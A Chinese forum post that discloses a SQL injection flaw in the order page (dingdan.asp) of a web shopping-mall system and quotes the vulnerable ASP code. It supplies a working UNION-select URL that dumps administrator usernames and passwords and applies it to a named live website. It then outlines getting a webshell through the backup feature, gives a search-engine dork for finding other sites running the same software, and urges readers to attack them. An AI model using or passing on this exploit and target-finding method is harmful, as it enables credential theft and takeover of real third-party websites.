作者:flaw0r 版本:v1.1a Bulid 20090413 Access Free 漏洞一:dingdan.asp注入漏洞 漏洞等级:严重 问题代码: dingdan=request.QueryString("dan") set rs=server.CreateObject("adodb.recordset") rs.open "select BJX_goods.bookid,BJX_goods.shjiaid,BJX_goods.bookname,BJX_goods.shichangjia,BJX_goods.huiyuanjia, bjx_action.actiondate,bjx_action.shousex,bjx_action.danjia,bjx_action.feiyong,bjx_action.fapiao, bjx_action.userzhenshiname,bjx_action.shouhuoname,bjx_action.dingdan,bjx_action.youbian, bjx_action.liuyan,bjx_action.zhifufangshi,bjx_action.songhuofangshi,bjx_action.zhuangtai, bjx_action.zonger,bjx_action.useremail,bjx_action.usertel,bjx_action.shouhuodizhi, bjx_action.bookcount,bjx_action.star, bjx_action.pingjia from BJX_goods inner join bjx_action on BJX_goods.bookid=bjx_action.bookid where bjx_action.username='"&request.Cookies("bjx")("username")&"'and dingdan='"&dingdan&"'",conn,1,1 注入测试代码: http://192.168.1.3/yhshop/dingdan.asp?dan=2009422172358'%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from %20BJX_admin%20where%20'1'='1 其实面对这套系统,真的很无语,和我之前分析的BOBO网店商城系统是一个内核,所以漏洞和BOBO的也就大同小异了,这里我只给出一个注入漏洞,真不知道现在的人都是怎么想的,拿别人的程序一改就能赚钱?鄙视偷窃别人源码,拿去卖钱的人!(不是说这套程序是作者抄袭别人的,我拿的这套也是免费的,先鄙视下BOBO) 后台有备份功能,所以拿SHELL也就相对简单些了。 网络实战: 在百度搜索:易和阳光购物商城 选定目标:http://eshop.iheeo.com/ 首先注册一个用户,随便选一个商品下个订单,然后到会员中心查看改订单 提交我们的测试语句: http://eshop.iheeo.com/dingdan.asp?dan=2009423113536'%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from%20BJX_admin%20where%20'1'='1 就可以爆出所有管理员的用户名和密码了 拿到管理员密码登入后台,可以通过备份数据库来获得WEBSHELL 提示:google搜索:inurl:product.asp?Iheeoid= 可以找到一些使用此套系统的网站,大家行动吧! |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 11:36 , Processed in 0.203064 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.